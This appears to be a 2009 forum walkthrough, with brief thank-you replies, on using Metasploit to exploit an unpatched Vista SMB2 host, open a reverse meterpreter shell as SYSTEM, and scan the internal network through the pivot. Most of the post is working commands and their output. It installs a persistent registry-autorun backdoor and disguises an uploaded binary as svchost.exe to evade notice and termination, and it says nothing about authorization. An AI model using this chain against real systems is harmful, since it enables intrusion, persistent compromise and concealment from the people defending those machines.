Meta "Pivot" Scanning - and other usefull junk

[imported_vvpalin]

I apologize if this is written some other place but i found it rather usefull. I took the last few months off to do some really heavy learning and its been a long time since i wrote a guide so honestly im just trying to get my hands dirty before i start writing some more in depth stuff.
A word to the wise, while there is a way to scan directly through a pivot and it has its advantages, let me tell you something from experience, not only is it slow, but its also highly unreliable. More than a few times it has crashed my session or failed to pick up known open ports.

All that being said lets get started.

First you need to go here and download the .zip
Downloads - pivot-scan - Project Hosting on Google Code

Now for the install

unzip pivotscan_rb.zip
sed -i 's/(Yes)/(,)/' pivot-scan.rb
sed -i 's/sl -q 1000 -s -c 3/sl -q 1000 -s -c 1000/' pivot-scan.rb
mv pivot-scan.rb /pentest/exploits/framework3/scripts/meterpreter/

### The above sed commands are fairly important otherwise you wont be seeing everything you should.

Lets loadup msfconsole and find us a vulnerable host

I managed to find myself a nice and juicy unpatched vista smb2 exploit to use on 192.168.10.104 so ...

msf > use scanner/smb/smb2

msf auxiliary(smb2) > set rhosts 192.168.10.104
rhosts => 192.168.10.104

msf auxiliary(smb2) > run
[*] 192.168.10.104 supports SMB 2 [dialect 2.2] and has been online for 87 hours[*] Auxiliary module execution completed
msf auxiliary(smb2) >

Now lets cross our fingers

msf ) > use windows/smb/smb2_negotiate_func_index

msf > set rhost 192.168.10.104
rhost => 192.168.10.104

msf > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf > set lhost 192.168.10.126
lhost => 192.168.10.126

msf > set lport 445
lport => 445

msf > set ExitOnSession false
ExitOnSession => false

msf > exploit -j
[*] Started reverse handler
[*] Connecting to the target (192.168.10.104:445)
[*] Sending the exploit packet (872 bytes)
[*] Waiting up to 180 seconds for exploit to trigger
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.10.126:445 -> 192.168.10.104:49208)

msf > sessions -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Meterpreter 192.168.10.126:445 -> 192.168.10.104:49208 windows/smb/smb2_negotiate_func_index

msf >

Sweet!! now we have our nicely exploited pc so lets do a little maintaince then move onto the scanning

msf > sessions -i 1
[*] Starting interaction with 1

meterpreter > sysinfo
Computer: WIN-BPTA72KBDYU
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run persistence -X -i 60 -r 192.168.10.126 -p 8080
[*] Creating a persistent agent: LHOST=192.168.10.126 LPORT=8080 (interval=60 onboot=true)
[*] Persistent agent script is 47309 bytes long
[*] Uploaded the persistent agent to C:\Windows\TEMP\oFVccxSg.vbs
[*] Agent executed with PID 3904
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN

meterpreter >

Now that we have a persistent backdoor incase something fails lets start our scanning.

meterpreter > run pivot-scan.rb -a
[*] Created by Augusto Pereyra aepereyra at gmail.com
[*] Uploading Portscanner
[*] Performing portscanning for IP range 192.168.10.1-192.168.10.254

-------------------------------------
192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
-------------------------------------
192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
-------------------------------------
meterpreter >

There are a few other ways we can do this also, the first simple way is like so.

meterpreter > upload /pentest/windows-binaries/scanners/sl.exe c:\\windows\\system32\\
[*] uploading : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\
[*] uploaded : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\\sl.exe


meterpreter > execute -f cmd.exe -c -H -t
Process 3804 created.
Channel 3 created.

meterpreter > interact 3
Interacting with channel 3...

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32> sl -s 192.168.10.1-254
sl -s 192.168.10.1-254
Scan of 254 IPs started at Sun Oct 25 22:49:11 2009
192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
-------------------------------------------------------------------------------
C:\Windows\system32> exit
meterpreter >

Ok so on to the last method, first we need to do just a small little change however. It isnt necessary but ill explain.

cd /pentest/exploits/framework3/scripts/meterpreter/
sed -i 's/svhost#{rand(100)}/svchost/' uploadexec.rb
sed -i 's/prin_status/print_status/' uploadexec.rb
sed -i 's/TEMP/WINDIR/g' uploadexec.rb

Ok first command changes what you upload from something like svhost11.exe to svchost.exe .. why you ask?? Well 2 reasons one its less obvious, but the more important is because you can not kill anything named svchost.exe .. just try renaming calc.exe and find out. The second is to fix a bug which hopefully within the next day or so will be updated, and the last command just changes our default dir to the default c:windows.

meterpreter > run uploadexec -e /pentest/windows-binaries/scanners/sl.exe -o "-s 192.168.10.1-254" -v -r
[*] Running Upload and Execute Meterpreter script....
[*] Uploading /pentest/windows-binaries/scanners/sl.exe....
[*] /pentest/windows-binaries/scanners/sl.exe uploaded!
[*] Uploaded as C:\Windows\svchost.exe
[*] Running command C:\Windows\svchost.exe

192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
[*] Deleting C:\Windows\svchost.exe
[*] Finnished!
meterpreter >

[Isohump]

Thnx for the info can't wait to try it.. ^_^

[imported_wyze]

Nicely done

[freemymind]

Great post and thanks for sharing. Looking forward to your next posts.

[Miland3r]

Hi vvpalin,
very neat howto, thanks. Will definitely be looking out for future posts.